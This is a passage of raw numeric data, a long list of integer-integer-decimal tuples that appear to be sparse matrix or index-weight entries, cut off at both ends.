32452,1.07331),(112,32453,0.23331),(112,32454,0.95669),(112,32455,1.02669),(112,32456,0.95669),(112,32457,1.09669),(112,32458,0.18669),(112,32459,0.86331),(112,32460,1.07331),(112,32461,0.28),(112,32462,0.98),(112,32463,1.12),(112,32464,0.37331),(112,32465,1.00331),(112,32466,1.07331),(112,32467,0.28),(112,32468,0.93331),(112,32469,1.16669),(112,32470,0.86331),(112,32471,1.02669),(112,32472,0.91),(112,32473,1.05),(112,32474,0.32669),(112,32475,1.00331),(112,32476,1.16669),(112,32477,0.84),(112,32478,0.95669),(112,32479,1.05),(112,32480,1.00331),(112,32481,1.09669),(112,32482,0.95669),(112,32483,1.07331),(112,32484,0.32669),(117,32484,0.65338),(112,32485,0.95669),(112,32486,1.05),(112,32487,0.88669),(112,32488,0.95669),(118,32489,0.23331),(119,32489,0.23331),(112,32489,0.46662),(112,32490,0.88669),(112,32491,0.95669),(112,32492,0.98),(112,32493,1.23669),(112,33098,0.23331),(112,33099,0.91),(112,33100,1.02669),(112,33101,1.00331),(112,33102,1.07331),(112,33103,1.05),(112,33104,1.14331),(112,33105,1.16669),(112,33106,0.93331),(112,33107,1.07331),(112,33108,0.86331),(112,33109,0.95669),(112,33110,0.42),(120,33110,0.42),(126,33110,0.42),(112,33111,1.09669),(112,33112,1.28331),(112,33113,0.93331),(120,33113,0.93331),(112,33114,1.00331),(112,33115,0.32669),(112,33116,0.98),(112,33117,1.23669),(112,33118,0.23331),(112,33119,0.91),(112,33120,1.02669),(112,33121,0.28),(112,33122,1.05),(112,33123,1.16669),(112,33124,1.05),(112,33125,1.19),(112,33126,0.23331),(112,33127,0.98),(112,33128,1.12),(112,33467,0.98),(112,33468,1.16669),(112,33469,1.00331),(112,33470,1.16669),(112,33471,0.91),(112,33472,1.09669),(112,33473,0.88669),(112,33474,0.98),(112,33475,0.93331),(112,33476,1.05),(112,33477,0.88669),(112,33478,1.09669),(112,33479,0.93331),(112,33480,0.95669),(112,33481,1.09669),(112,33482,0.95669),(112,33483,1.02669),(113,33694,0.95669),(113,33695,0.93331),(113,33696,1.23669),(113,33697,1.02669),(113,33698,1.14331),(113,33699,1.05),(113,33700,1.19),(113,33701,0.95669),(113,33702,1.21331),(113,33703,0.46669),(113,33704,1.07331),(113,33705,1.23669),(113,33706,0.95669),(113,33707,1.05),(113,33708,0.28),(117,33708,0.28),(113,33709,0.98),(113,33710,1.12),(113,33711,0.93331),(113,33712,1.09669),(113,33713,1.02669),(113,33714,1.16669),(113,33715,1.05),(113,33716,1.12),(128,33717,2.79993),(113,33717,7.46648),(128,33718,3.21993),(113,33718,8.58648),(113,33719,0.93331),(113,33720,1.09669),(113,33721,0.93331),(113,33722,1.00331),(113,33723,1.00331),(113,33724,1.09669),(113,33725,0.93331),(113,33726,1.05),(113,33727,0.98),(113,33728,1.09669),(113,33729,0.23331),(113,33730,0.91),(113,33731,0.98),(113,33732,0.28),(113,33733,0.93331),(113,33734,1.14331),(113,33735,0.95669),(128,33735,1.91338),(113,33736,1.12),(113,33737,0.46669),(128,33737,0.46669),(113,33738,1.00331),(113,33739,1.12),(113,33740,0.86331),(113,33741,1.12),(113,33742,0.95669),(113,33743,1.09669),(113,33744,0.95669),(113,33745,1.07331),(113,33746,0.95669),(113,33747,1.09669),(113,33748,0.65338),(113,33749,0.98),(113,33750,1.12),(113,33751,1.00331),(113,33752,1.16669),(113,33753,1.86655),(113,33754,0.98),(113,33755,1.09669),(113,33756,1.02669),(113,33757,1.16669),(113,33758,1.14331),(113,33759,1.21331),(113,33760,1.91338),(113,33761,1.14331),(113,33762,1.07331),(113,33763,2.98648),(113,33764,0.98),(113,33765,1.09669),(113,33766,1.12),(113,33767,1.19),(113,33768,1.05),(113,33769,1.14331),(113,33770,0.95669),(113,33771,1.16669),(113,33772,1.12),(113,33773,1.23669),(113,33774,1.12),(113,33775,1.21331),(113,33776,1.09669),(113,33777,1.23669),(113,33778,1.00331),(113,33779,1.14331),(113,33780,0.42),(113,33781,0.98),(113,33782,1.07331),(113,33783,0.42),(113,33784,1.02669),(113,33785,1.12),(113,33786,0.32669),(113,33787,0.93331),(113,33788,1.05),(113,33789,0.23331),(113,33790,0.91),(113,33791,1.05),(113,33792,0.88669),(113,33793,1.12),(113,33794,0.86331),(113,33795,1.00331),(113,33796,0.95669),(113,33797,1.09669),(113,33798,0.93331),(113,33799,1.07331),(113,33800,2.14662),(113,33801,2.42662),(113,33802,1.00331),(113,33803,1.14331),(113,33804,0.60669),(113,33805,1.14331),(113,33806,1.30669),(113,33807,1.02669),(113,33808,1.21331),(113,33809,0.32669),(113,33810,1.00331),(113,33811,1.23669),(113,33812,0.46669),(118,33812,0.46669),(113,33813,1.00331),(113,33814,1.12),(113,33815,1.02669),(113,33816,1.19),(113,33817,0.51331),(113,33818,1.02669),(113,33819,1.19),(113,33820,0.28),(113,33821,0.93331),(113,33822,1.21331),(113,33823,0.28),(113,33824,0.95669),(126,33824,0.95669),(113,33825,1.05),(113,34569,1.26),(113,34570,2.19338),(113,34571,2.24),(113,34572,1.14331),(128,34573,2.24),(113,34573,4.48),(113,34574,1.14331),(113,34575,1.07331),(113,34576,1.12),(113,34577,1.19),(113,34578,2.19338),(113,34579,1.14331),(128,34579,1.14331),(128,34580,2.33338),(113,34580,5.83345),(113,34581,3.50007),(128,34582,4.38676),(113,34582,7.67683),(128,34583,2.14662),(113,34583,5.36655),(128,34584,2.19338),(113,34584,7.67683),(113,34585,2.24),(128,34586,1.16669),(113,34586,3.50007),(128,34587,1.16669),(113,34587,2.33338),(113,34588,2.28662),(113,34589,2.24),(128,34589,2.24),(113,34590,2.28662),(128,34590,3.42993),(113,34591,3.36),(128,34591,3.36),(113,34592,3.50007),(128,34593,1.19),(113,34593,2.38),(128,34594,3.36),(113,34594,5.6),(113,34595,4.57324),(128,34595,4.57324),(113,34596,0.56),(113,34597,0.95669),(113,34598,1.09669),(113,34599,0.98),(113,34600,1.05),(113,34601,1.00331),(113,34602,0.32669),(113,34603,0.93331),(113,34604,1.09669),(113,34605,0.65338),(113,34606,2.14662),(113,34607,1.23669),(113,34608,1.14331),(113,34609,1.02669),(113,34610,0.56),(113,34611,1.05),(113,34612,1.23669),(113,34613,0.51331),(113,34614,1.05),(113,34615,1.12),(113,34616,0.32669),(113,34617,1.16669),(113,34618,1.30669),(113,34619,1.07331),(113,34620,1.19),(113,34621,1.4),(113,34622,0.51331),(113,34623,1.02669),(113,34624,1.28331),(113,34625,0.32669),(113,34626,1.05),(113,34627,1.12),(113,35198,1.02669),(113,35199,0.91),(113,35200,1.05),(113,35201,1.09669),(113,35202,0.95669),(113,35203,0.98),(113,35204,2.05338),(113,35205,1.16669),(113,35206,1.14331),(113,35207,1.82),(113,35208,2.1),(113,35209,0.98),(113,35210,1.19),(113,35211,1.05),(114,35286,0.28),(114,35287,1.05),(114,35288,1.23669),(114,35289,0.37331),(114,35290,0.95669),(114,35291,1.09669),(114,35292,0.37331),(114,35293,1.12),(114,35294,1.23669),(114,35295,0.42),(114,35296,0.95669),(114,35297,1.09669),(114,35298,0.37331),(114,35299,1.16669),(114,35300,1.33),(114,35301,0.93331),(114,35302,0.37331),(114,35303,0.93331),(114,35304,1.02669),(114,35305,0.14),(114,35306,0.84),(114,35307,0.93331),(114,35308,0.56),(114,35309,1.14331),(114,35310,1.37669),(114,35311,0.95669),(114,35312,1.19),(114,35313,0.28),(121,35313,0.28),(114,35314,1.16669),(114,35315,1.30669),(114,35316,0.95669),(114,35317,1.16669),(114,35318,1.02669),(114,35319,1.16669),(114,35320,1.21331),(114,35321,0.84),(114,35322,1.00331),(114,35323,1.07331),(114,35324,1.05),(114,35325,1.14331),(114,35326,0.56),(114,35327,1.21331),(114,35328,1.35331),(114,35329,0.42),(114,35330,1.05),(114,35331,1.21331),(114,35332,0.18669),(114,35333,0.88669),(114,35334,1.02669),(114,35335,0.51331),(114,35336,1.02669),(114,35337,1.09669),(114,35338,0.56),(114,35339,1.07331),(114,35340,1.21331),(114,35341,0.91),(114,35342,1.05),(114,35343,0.23331),(114,35344,0.98),(114,35345,1.05),(114,35346,0.32669),(114,35347,1.07331),(114,35348,1.12),(114,35349,0.37331),(114,35350,0.95669),(114,35351,1.19),(114,35352,0.84),(114,35353,1.02669),(114,35734,0.42),(114,35735,1.21331),(114,35736,1.37669),(114,35737,1.12),(114,35738,1.14331),(114,35739,1.12),(114,35740,1.09669),(114,35741,1.02662),(114,35742,1.02669),(114,35743,1.28331),(114,35744,1.12),(114,35745,1.19),(114,35746,0.56),(114,35747,1.02669),(114,35748,1.16669),(114,35749,0.7),(114,35750,1.23669),(114,35751,1.35331),(114,35752,0.93338),(114,35753,1.07331),(114,35754,1.28331),(114,35755,1.05),(114,35756,1.19),(114,35757,1.12),(114,35758,0.37331),(114,35759,0.98),(114,35760,1.21331),(114,35761,0.37331),(114,35762,0.98),(114,35763,1.16669),(114,35764,0.32669),(114,35765,0.93331),(114,35766,1.02669),(114,35767,0.37331),(114,35768,1.19),(114,35769,1.23669),(114,35770,0.23331),(114,35771,0.95669),(114,35772,1.12),(114,35773,0.32669),(114,35774,0.98),(114,35775,1.09669),(114,35776,0.32669),(114,35777,1.05),(114,35778,1.12),(114,35779,0.42),(114,35780,1.00331),(114,35781,1.09669),(114,35782,0.32669),(114,35783,0.91),(114,35784,1.00331),(114,35785,0.93331),(114,35786,0.98),(114,35787,0.14),(126,35787,0.14),(114,35788,0.93331),(114,35789,1.00331),(114,35790,0.18669),(114,35791,1.05),(114,35792,1.14331),(114,35934,0.77),(114,35935,0.98),(114,35936,0.95669),(114,35937,1.21331),(120,36085,0.23331),(126,36102,0.28),(126,36103,0.91),(116,36144,0.37331),(116,37139,0.86331),(116,37140,1.09669),(116,37141,0.88669),(116,37142,1.12),(116,37143,0.88669),(116,37144,1.14331),(116,37145,0.32669),(116,37146,0.95669),(116,37147,1.12),(116,37148,0.23331),(117,37148,0.23331),(116,37149,0.91),(116,37150,1.02669),(116,37151,0.37331),(116,37152,0.95669),(116,37153,1.14331),(116,37154,1.00331),(116,37155,1.16669),(116,37156,1.07331),(116,37157,1.16669),(116,37158,1.02669),(116,37159,1.26),(116,37160,0.28),(116,37161,0.93331),(116,37162,1.02669),(116,37163,0.88669),(116,37164,1.14331),(116,37165,0.88669),(116,37166,1.07331),(116,37167,0.98),(116,37168,1.09669),(116,37169,0.32669),(116,37170,1.05),(116,37171,1.16669),(116,37172,0.98),(116,37173,1.09669),(116,37174,0.32669),(116,37175,0.95669),(116,37176,1.02669),(116,37444,0.23331),(116,37445,1.00331),(116,37446,1.12),(116,37447,0.28),(116,37448,0.93331),(116,37449,1.05),(116,37450,0.32669),(116,37451,1.02669),(116,37452,1.23669),(116,37453,0.32669),(116,37454,0.98),(116,37455,1.16669),(116,37644,0.88669),(116,37645,1.07331),(116,37646,0.95669),(116,37647,0.88669),(116,37648,1.07331),(116,37649,0.32669),(116,37650,1.02669),(116,37651,1.12),(116,37652,0.91),(116,37653,0.98),(116,37654,0.95669),(116,37655,1.05),(116,37656,0.91),(116,37657,1.02669),(116,37658,0.91),(116,37659,0.98),(116,37660,1.07331),(116,37661,0.95669),(118,37661,0.95669),(116,37662,1.05),(116,37663,0.95669),(116,37664,1.14331),(117,37906,0.86331),(117,37907,0.98),(117,37908,0.18669),(117,37909,0.91),(117,37910,1.00331),(117,37911,1.02669),(117,37912,0.93331),(117,37913,1.05),(117,37914,0.93331),(117,37915,1.09669),(117,37916,0.93331),(117,37917,1.05),(117,37918,0.18669),(120,37918,0.18669),(117,37919,0.88669),(117,37920,1.00331),(117,37921,0.28),(117,37922,1.00331),(117,37923,1.14331),(117,37924,1.12),(117,37925,1.23669),(117,37926,1.00331),(117,37927,1.21331),(117,37928,1.07331),(117,37929,1.19),(117,37930,1.49324),(117,37931,1.00331),(117,37932,1.19),(117,37933,1.02669),(117,37934,1.12),(117,37935,1.07331),(117,37936,1.23669),(117,37937,0.98),(117,37938,1.09669),(117,37939,0.93331),(117,37940,1.05),(117,37941,0.37331),(120,37941,0.37331),(117,37942,0.98),(120,37942,0.98),(117,37943,1.09669),(117,37944,0.93331),(117,37945,1.05),(117,37946,0.95669),(117,37947,1.14331),(117,37948,1.02669),(117,37949,1.19),(117,37950,0.28),(117,37951,1.02669),(117,37952,1.23669),(117,37953,0.46669),(117,37954,1.21331),(117,37955,1.4),(117,37956,0.28),(117,37957,0.93331),(117,37958,1.02669),(117,37959,1.14331),(117,37960,1.37669),(117,37961,0.86331),(117,37962,0.23331),(117,37963,0.95669),(117,37964,1.02669),(120,37965,0.32669),(123,37965,0.32669),(117,37965,0.98007),(117,37966,1.00331),(117,37967,1.19),(117,37968,1.02669),(117,37969,1.21331),(117,37970,0.98),(117,37971,1.05),(117,37972,0.74662),(117,37973,0.98),(117,37974,1.14331),(117,37975,0.95669),(117,37976,1.02669),(117,37977,0.91),(117,37978,1.00331),(117,37979,1.00331),(117,37980,0.32669),(117,37981,0.95669),(117,37982,1.05),(117,37983,0.95669),(117,37984,1.09669),(117,37985,0.95669),(117,37986,1.07331),(117,37987,0.93331),(117,37988,1.05),(117,37989,0.51331),(117,37990,1.14331),(117,37991,1.21331),(117,37992,0.37331),(117,37993,0.95669),(117,37994,1.14331),(117,37995,0.28),(125,37995,0.28),(117,37996,0.98),(117,37997,1.07331),(117,37998,0.98),(117,37999,1.12),(117,38000,0.42),(117,38001,1.02669),(117,38002,1.12),(117,38003,0.98),(117,38004,1.23669),(117,38005,1.09669),(117,38006,1.28331),(117,38633,1.16669),(117,38634,1.05),(117,38635,0.28),(117,38636,0.91),(117,38637,0.95669),(117,38638,0.23331),(117,38639,0.91),(117,38640,1.19),(117,38641,0.98),(117,38642,1.09669),(117,38643,0.37331),(117,38644,1.02669),(117,38645,1.19),(117,38646,1.16669),(117,38647,0.23331),(117,38648,0.91),(117,38649,0.98),(117,38650,0.46669),(118,38650,0.46669),(117,38651,1.05),(117,38652,1.23669),(117,38653,0.18669),(117,38654,0.88669),(117,38655,1.09669),(117,38656,0.28),(117,38657,0.88669),(117,38658,0.98),(117,38659,0.28),(117,38660,0.93331),(117,38661,1.12),(117,38662,0.93331),(117,38663,1.16669),(117,38664,0.28),(123,38664,0.28),(117,38665,0.91),(117,38666,1.05),(117,38667,0.18669),(128,38667,0.18669),(117,38668,0.88669),(117,38669,0.95669),(117,38670,0.18669),(117,38671,0.98),(117,38672,1.07331),(117,38673,0.28),(117,38674,1.00331),(117,38675,1.14331),(117,39083,0.77),(117,39084,0.98),(117,39085,0.88669),(117,39086,1.09669),(117,39087,0.88669),(117,39088,0.95669),(117,39089,0.84),(117,39090,0.93331),(117,39091,0.93331),(117,39092,1.00331),(117,39093,0.86331),(117,39094,0.98),(117,39095,0.88669),(117,39096,0.98),(117,39097,0.84),(117,39098,0.91),(117,39099,0.88669),(117,39100,0.93331),(117,39101,0.86331),(117,39102,0.93331),(117,39103,0.88669),(117,39104,0.98),(117,39105,0.93331),(117,39106,1.09669),(117,39107,0.88669),(117,39108,1.09669),(117,39109,1.00331),(117,39110,1.09669),(117,39111,0.88669),(117,39112,0.98),(125,39113,0.91),(117,39113,1.82),(117,39114,1.02669),(117,39115,1.02669),(117,39116,0.91),(117,39117,1.05),(117,39118,0.93331),(117,39119,1.00331),(117,39120,0.95669),(117,39121,1.05),(117,39122,0.93331),(117,39123,0.91),(117,39124,1.00331),(117,39125,0.95669),(117,39126,1.05),(117,39127,0.91),(123,39127,0.91),(117,39128,1.00331),(117,39129,0.95669),(117,39130,1.07331),(117,39131,0.93331),(117,39132,1.05),(117,39133,0.98),(117,39134,1.21331),(117,39135,0.23331),(117,39136,1.02669),(117,39137,1.09669),(117,39138,0.18669),(117,39139,0.86331),(117,39140,1.05),(118,39143,0.34),(118,39234,0.28),(118,39235,0.98),(118,39236,1.14331),(118,39237,1.02669),(118,39238,1.09669),(118,39239,0.95669),(118,39240,1.14331),(118,39241,1.12),(118,39242,0.91),(118,39243,1.00331),(118,39244,0.51331),(118,39245,1.02669),(118,39246,1.19),(118,39247,0.93331),(118,39248,1.02669),(118,39249,0.46669),(118,39250,1.05),(118,39251,1.21331),(118,39252,1.02669),(118,39253,1.19),(118,39254,1.12),(118,39255,1.00331),(118,39256,1.09669),(118,39573,0.28),(118,39574,0.98),(118,39575,1.12),(118,39576,1.02669),(118,39577,1.12),(118,39578,0.46669),(118,39579,1.26),(118,39580,1.35331),(118,39581,1.02669),(118,39582,1.28331),(118,39583,0.46669),(118,39584,1.19),(118,39585,1.28331),(118,39586,0.23331),(118,39587,0.88669),(118,39588,1.05),(118,39782,0.86331),(118,39783,1.00331),(118,39784,0.93331),(118,39785,1.07331),(118,39786,0.84),(125,39786,0.84),(118,39787,0.93331),(118,39788,1.00331),(118,39789,0.91),(118,39790,1.02669),(118,39791,1.05),(119,40072,0.93331),(119,40073,1.12),(119,40074,0.86331),(119,40075,0.95669),(119,40076,1.00331),(119,40077,1.12),(119,40078,0.23331),(119,40079,0.93331),(119,40080,1.07331),(119,40081,0.88669),(119,40082,0.93331),(119,40083,1.00331),(119,40084,1.14331),(119,40085,0.93331),(119,40086,1.09669),(119,40087,1.05),(119,40088,1.14331),(119,40089,0.91),(119,40090,1.00331),(119,40091,0.28),(119,40092,0.93331),(119,40093,1.12),(119,40094,0.32669),(119,40095,0.93331),(119,40096,1.12),(119,40097,1.16669),(119,40098,0.42),(119,40099,0.98),(119,40100,1.21331),(119,40101,1.05),(119,40102,1.14331),(119,40103,0.98),(119,40104,1.02669),(119,40105,1.02669),(119,40106,1.14331),(119,40107,0.88669),(119,40108,0.98),(119,40109,0.88669),(119,40110,1.07331),(119,40111,1.05),(119,40112,1.16669),(119,40113,0.28),(119,40114,0.93331),(119,40115,1.02669),(119,40116,0.32669),(119,40117,1.00331),(119,40118,1.07331),(119,40119,4.47972),(119,40120,0.95669),(119,40121,1.12),(119,40122,1.00331),(119,40123,1.09669),(119,40124,1.07331),(119,40125,1.14331),(119,40126,0.98),(119,40127,1.02669),(119,40128,1.00331),(119,40129,1.05),(119,40130,0.95669),(119,40131,1.00331),(119,40132,1.00331),(119,40133,1.12),(119,40134,1.00331),(119,40135,1.16669),(119,40136,1.09669),(119,40137,1.21331),(119,40138,0.98),(119,40139,1.02669),(119,40140,1.96),(119,40141,1.19),(119,40142,1.05),(119,40143,0.46669),(119,40144,1.05),(119,40145,1.14331),(119,40146,0.23331),(119,40147,1.02669),(119,40148,1.21331),(119,40149,0.95669),(119,40150,1.14331),(119,40656,0.32669),(119,40657,1.02669),(119,40658,1.16669),(119,40659,0.37331),(119,40660,0.95669),(119,40661,1.12),(119,40662,1.00331),(119,40663,1.09669),(119,40664,0.32669),(119,40665,0.91),(119,40666,0.98),(119,40667,0.51331),(119,40668,1.14331),(119,40669,1.26),(119,40670,0.46669),(119,40671,1.00331),(119,40672,1.09669),(119,40673,0.37331),(119,40674,1.09669),(119,40675,1.21331),(119,40676,0.37331),(119,40677,0.98),(119,40678,1.05),(119,40679,0.56007),(119,40680,0.84),(119,40681,0.95669),(119,40682,1.00331),(119,40683,1.12),(119,40684,0.88669),(119,40685,0.98),(119,40686,0.32669),(120,40686,0.32669),(119,40687,1.12),(119,40688,1.19),(119,40689,0.91),(119,40690,1.05),(119,40691,0.28),(119,40692,1.02669),(119,40693,1.23669),(119,40694,1.63345),(119,40695,0.95669),(119,40696,1.12),(119,40697,1.05),(119,40698,1.26),(119,40699,1.07331),(119,40700,1.16669),(119,40701,1.05),(119,40702,1.16669),(119,40703,0.98),(119,40704,1.21331),(119,40705,1.02669),(119,40706,1.14331),(119,40707,0.98),(119,40708,1.21331),(119,41059,0.98),(119,41060,1.02669),(119,41061,0.98),(119,41062,1.07331),(119,41063,0.86331),(119,41064,1.00331),(119,41065,0.95669),(119,41066,1.05),(126,41066,1.05),(119,41067,1.05),(119,41068,0.88669),(119,41069,1.02669),(119,41070,0.91),(119,41071,1.00331),(119,41072,0.91),(119,41073,1.00331),(119,41074,1.07331),(119,41075,1.28331),(119,41076,1.02669),(119,41077,1.28331),(120,41126,0.48),(120,41127,0.93331),(120,41128,1.00331),(120,41434,0.93331),(120,41435,1.07331),(120,41436,0.93331),(120,41437,1.05),(120,41438,0.93331),(120,41439,1.05),(120,41440,0.86331),(120,41441,1.07331),(120,41442,1.02669),(120,41443,0.32669),(120,41444,0.93331),(120,41445,1.02669),(120,41446,0.28),(120,41447,0.88669),(120,41448,1.09669),(120,41449,0.91),(120,41450,1.09669),(120,41451,1.07331),(120,41452,1.16669),(120,41453,1.11993),(120,41454,1.02669),(120,41455,1.09669),(120,41456,1.07331),(120,41457,1.21331),(120,41458,0.98),(120,41459,1.05),(120,41460,0.65331),(120,41461,1.14331),(120,41462,1.28331),(120,41463,0.95669),(120,41464,1.09669),(120,41465,0.93331),(120,41466,1.05),(120,41467,0.98),(120,41468,1.14331),(120,41469,1.21331),(120,41470,1.05),(120,41471,1.23669),(120,41472,1.02669),(120,41473,1.26),(120,41474,0.18669),(120,41475,1.00331),(120,41476,1.12),(120,41477,0.93331),(120,41478,1.05),(120,41479,2.79993),(120,41480,1.14331),(120,41481,1.02669),(120,41482,1.00331),(120,41483,0.86331),(120,41484,0.98),(120,41485,0.23331),(120,41486,1.16669),(120,41487,1.35331),(120,41488,0.93331),(120,41489,0.98),(120,41490,0.95669),(120,41491,1.09669),(120,41492,0.93331),(120,41493,1.16669),(120,41494,0.93331),(120,41495,1.05),(120,41496,0.88669),(120,41497,0.98),(120,41498,0.93331),(120,41499,1.07331),(120,41500,0.88669),(120,41501,1.00331),(120,41502,1.02669),(120,41503,0.51331),(120,41504,1.07331),(120,41505,1.23669),(120,41506,1.09669),(120,41507,1.02669),(120,41508,1.19),(120,41509,1.00331),(120,41510,1.07331),(120,41511,1.07331),(120,41512,1.16669),(120,41513,1.02669),(120,41514,1.16669),(120,41515,0.98),(120,41516,1.07331),(120,41517,0.98),(120,41518,1.19),(120,41519,0.51331),(120,41520,1.09669),(120,41521,1.19),(120,41522,1.05),(120,41523,1.14331),(120,41524,0.42),(120,41525,1.09669),(120,41526,1.23669),(120,41527,0.32669),(126,41527,0.32669),(120,41528,0.93331),(120,41529,1.12),(120,41530,0.32669),(120,41531,1.07331),(120,41532,1.19),(120,41533,0.42),(120,41534,0.95669),(120,41535,1.19),(120,41536,0.37331),(123,41536,0.74662),(120,41537,1.12),(120,41538,1.30669),(120,41539,0.37331),(120,41540,0.98),(120,41541,1.21331),(120,41542,0.84),(120,41543,1.05),(120,41544,1.26),(120,41545,0.98),(120,41546,1.07331),(120,41547,0.88669),(120,41548,1.02669),(120,41549,0.93331),(120,41550,1.12),(120,41551,0.42),(134,41551,0.42),(120,41552,1.12),(120,41553,1.26),(120,41554,1.02669),(120,41555,1.09669),(120,41556,0.28),(120,41557,0.91),(120,41558,1.16669),(120,41559,1.00331),(120,41560,1.12),(120,41561,0.74662),(120,41562,1.02669),(120,41563,1.21331),(120,41564,0.95669),(120,41565,1.05),(120,41566,0.37331),(120,41567,0.95669),(120,41568,1.09669),(120,42459,1.21331),(120,42460,0.95669),(120,42461,1.00331),(120,42462,0.37331),(120,42463,1.02669),(120,42464,1.16669),(120,42465,0.98),(120,42466,1.05),(120,42467,0.42),(120,42468,1.00331),(120,42469,1.26),(120,42470,0.74662),(120,42471,1.91338),(120,42472,1.12),(120,42473,1.07331),(120,42474,0.23331),(120,42475,0.88669),(120,42476,1.05),(120,42477,0.51331),(120,42478,1.09669),(120,42479,1.16669),(120,42480,0.37331),(120,42481,0.95669),(120,42482,1.07331),(120,42483,1.09669),(120,42484,1.16669),(120,42485,0.56),(120,42486,1.07331),(120,42487,1.26),(120,42488,0.42),(120,42489,0.98),(120,42490,1.12),(120,42491,0.28),(120,42492,0.93331),(120,42493,1.00331),(120,42494,0.95669),(120,42495,1.02669),(120,42496,1.07331),(120,42497,0.65331),(120,42498,1.21331),(120,42499,1.33),(120,42500,1.05),(120,42501,1.33),(120,42502,0.28),(120,42503,0.93331),(120,42504,1.12),(120,42505,0.86331),(120,42506,1.05),(120,42507,0.88669),(120,42508,1.07331),(120,42509,0.93331),(120,42510,1.16669),(120,43007,0.46662),(120,43008,1.09669),(120,43009,1.16669),(120,43010,0.93331),(120,43011,1.07331),(120,43012,0.18669),(120,43013,0.98),(120,43014,1.12),(120,43015,0.28),(120,43016,1.05),(120,43017,1.12),(120,43018,0.98),(120,43019,1.05),(120,43020,0.88669),(125,43020,0.88669),(120,43021,0.95669),(120,43022,0.91),(120,43023,1.12),(120,43024,0.95669),(120,43025,0.93331),(120,43026,1.00331),(120,43027,0.95669),(120,43028,1.07331),(120,43029,0.95669),(120,43030,1.09669),(120,43031,0.86331),(120,43032,0.98),(120,43033,0.91),(120,43034,1.00331),(121,43069,0.86331),(121,43070,1.14331),(121,43071,0.93331),(121,43072,1.12),(121,43073,0.28),(121,43074,1.02669),(121,43075,1.19),(121,43076,0.28),(121,43077,1.14331),(121,43078,1.4),(121,43079,0.51331),(121,43080,1.05),(121,43081,1.21331),(121,43082,0.23331),(121,43083,0.91),(121,43084,1.02669),(121,43085,0.46669),(121,43086,1.00331),(121,43087,1.26),(121,43088,0.84),(121,43089,1.12),(121,43090,1.00331),(121,43091,1.33),(121,43092,0.18669),(121,43093,0.86331),(121,43094,1.12),(121,43095,0.28),(121,43096,0.91),(121,43097,1.14331),(121,43098,0.93331),(121,43099,1.02669),(121,43100,0.91),(121,43101,1.14331),(121,43102,0.51331),(121,43103,1.00331),(121,43104,1.16669),(121,43105,0.51331),(121,43106,1.05),(121,43107,1.09669),(121,43108,0.86331),(121,43109,0.98),(121,43110,1.12),(121,43111,1.21331),(121,43112,0.42),(121,43113,0.98),(121,43114,1.4),(121,43115,0.18669),(121,43116,1.07331),(121,43117,1.16669),(121,43118,0.84),(121,43119,0.91),(121,43120,1.16669),(121,43121,1.14331),(121,43122,1.28331),(121,43123,1.05),(121,43124,1.12),(121,43365,0.51331),(121,43366,1.00331),(121,43367,1.19),(121,43368,0.42),(121,43369,1.14331),(121,43370,1.35331),(121,43371,0.42),(121,43372,1.02669),(121,43373,1.07331),(121,43374,2.28662),(121,43375,0.93338),(121,43376,1.00331),(121,43377,1.16669),(121,43378,1.00331),(121,43379,1.14331),(121,43380,0.95669),(121,43479,0.18669),(121,43480,1.09669),(121,43481,1.30669),(123,44663,0.09331),(123,44664,1.16669),(123,44665,1.28331),(123,44666,0.65338),(123,44667,0.93331),(123,44668,1.05),(123,44669,1.00331),(123,44670,1.16669),(123,44671,0.91),(123,44672,1.02669),(123,44673,0.86331),(123,44674,1.02669),(123,44675,0.93331),(123,44676,1.00331),(123,44677,1.05),(123,44678,1.16669),(123,44679,0.23331),(123,44680,0.93331),(123,44681,1.00331),(123,44682,1.40007),(123,44683,1.16669),(123,44684,1.28331),(123,44685,2.24),(123,44686,1.30669),(123,44687,1.19),(123,44688,0.23331),(123,44689,0.93331),(123,44690,1.12),(123,44691,0.88669),(123,44692,0.98),(123,44693,0.91),(123,44694,1.02669),(123,44695,0.23331),(123,44696,0.95669),(123,44697,1.05),(123,44698,0.95669),(123,44699,1.12),(123,44700,0.93331),(123,44701,1.02669),(123,44702,0.84),(123,44703,0.93331),(123,44704,0.95669),(123,44705,1.02669),(123,44706,0.56),(123,44707,1.19),(123,44708,1.28331),(123,44709,0.18669),(123,44710,0.88669),(123,44711,1.12),(123,44712,1.00331),(123,44713,1.09669),(123,44714,1.02669),(123,44715,1.23669),(123,44716,0.95669),(123,44717,1.05),(123,44718,0.93338),(123,44719,1.05),(123,44720,1.14331),(123,44721,1.00331),(123,44722,1.09669),(123,44723,0.98),(123,44724,1.07331),(123,44725,0.37331),(123,44726,1.00331),(123,44727,1.16669),(123,44728,0.42),(123,44729,0.98),(123,44730,1.07331),(123,44731,2.14662),(123,44732,2.47338),(123,44733,0.95669),(123,44734,1.09669),(123,45161,0.28),(123,45162,0.98),(123,45163,1.05),(123,45164,0.42),(123,45165,1.02669),(123,45166,1.28331),(123,45167,0.91),(123,45168,1.12),(123,45169,0.46669),(123,45170,1.02669),(123,45171,1.26),(123,45172,0.37331),(123,45173,1.02669),(123,45174,1.14331),(123,45175,0.37331),(123,45176,1.00331),(123,45177,1.12),(123,45178,0.98),(123,45179,1.07331),(123,45180,0.98007),(123,45181,0.93331),(123,45182,1.16669),(123,45183,0.95669),(123,45184,1.00331),(123,45185,0.95669),(123,45186,1.07331),(123,45187,0.18669),(123,45188,0.86331),(123,45189,1.05),(123,45190,0.93331),(123,45191,1.05),(123,45192,0.88669),(123,45193,0.98),(123,45194,0.32669),(123,45195,0.93331),(123,45196,1.05),(123,45399,0.93331),(123,45400,1.02669),(123,45401,0.95669),(123,45402,1.09669),(123,45403,0.91),(123,45404,1.00331),(123,45405,0.98),(123,45406,1.07331),(123,45407,1.00331),(125,47531,0.42),(125,47532,0.98),(125,47533,1.09669),(125,47534,0.28),(125,47535,1.09669),(125,47536,1.23669),(125,47537,0.23331),(125,47538,0.88669),(125,47539,0.95669),(125,47540,0.23331),(125,47541,0.91),(125,47542,1.19),(125,47543,0.28),(125,47544,0.95669),(125,47545,1.05),(125,47546,0.18669),(125,47547,0.86331),(125,47548,0.95669),(125,47549,0.91),(125,47550,1.02669),(125,47551,0.32669),(125,47552,0.98),(125,47553,1.05),(125,47554,0.93331),(125,47555,0.98),(125,47556,0.23331),(125,47557,0.93331),(125,47558,1.14331),(125,47559,0.32669),(125,47560,0.93331),(125,47561,1.02669),(125,47562,1.05),(125,47563,1.26),(125,47564,0.91),(125,47565,0.95669),(125,47566,0.98),(125,47567,1.07331),(125,47568,0.46662),(125,47569,1.00331),(125,47570,1.12),(125,47571,0.98),(125,47572,1.07331),(125,47573,1.00331),(125,475